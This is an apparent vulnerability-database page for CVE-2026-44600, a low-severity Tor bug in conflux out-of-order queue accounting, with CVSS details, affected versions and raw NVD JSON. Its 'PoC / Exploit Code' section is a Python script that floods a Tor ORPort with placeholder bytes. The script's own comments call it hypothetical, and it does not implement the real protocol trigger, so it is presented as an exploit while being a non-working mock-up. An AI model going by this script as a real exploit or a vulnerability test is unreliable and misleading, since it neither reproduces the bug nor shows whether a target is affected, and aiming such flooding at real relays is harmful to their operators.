Security Vulnerability Report
中文
CVE-2026-44600 CVSS 3.7 LOW

CVE-2026-44600

Published: 2026-05-07 03:16:09
Last Modified: 2026-05-07 17:26:29

Description

Tor before 0.4.9.7 mishandles accounting of the conflux out-of-order queue during the clearing of a queue, aka TROVE-2026-010.

CVSS Details

CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:torproject:tor:*:*:*:*:*:*:*:* - VULNERABLE
Tor < 0.4.9.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # Proof of Concept for CVE-2026-44600 (Conceptual) # This script attempts to trigger the conflux out-of-order queue accounting issue. # Note: This is a hypothetical demonstration based on the vulnerability description. import socket import time def trigger_vulnerability(target_ip, target_port): try: print(f"[+] Connecting to {target_ip}:{target_port}") # Create a socket connection to the Tor ORPort s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_ip, target_port)) # Hypothetical payload to trigger conflux queue clearing # In a real scenario, this would be a specific Tor protocol cell payload = b"\x00\x01\x02\x03" * 100 # Placeholder data print("[+] Sending payload to trigger queue mishandling...") for _ in range(1000): s.send(payload) # Small delay to allow processing time.sleep(0.01) s.close() print("[+] Payload sent. Check target for instability.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with actual target details for testing TARGET_IP = "127.0.0.1" TARGET_PORT = 9001 trigger_vulnerability(TARGET_IP, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44600", "sourceIdentifier": "[email protected]", "published": "2026-05-07T03:16:08.523", "lastModified": "2026-05-07T17:26:29.483", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tor before 0.4.9.7 mishandles accounting of the conflux out-of-order queue during the clearing of a queue, aka TROVE-2026-010."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-696"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:torproject:tor:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.4.9.7", "matchCriteriaId": "E643A817-85FE-4CEC-BC69-0E2FA22639C0"}]}]}], "references": [{"url": "https://forum.torproject.org/c/news/tor-release-announcement/28", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://gitlab.torproject.org/tpo/core/tor/-/commit/a198185ed863677d60eec120126730628dac35bb", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://gitlab.torproject.org/tpo/core/tor/-/work_items/41251", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://www.openwall.com/lists/oss-security/2026/05/06/8", "source": "[email protected]", "tags": ["Mailing List", "Third Party Advisory"]}]}}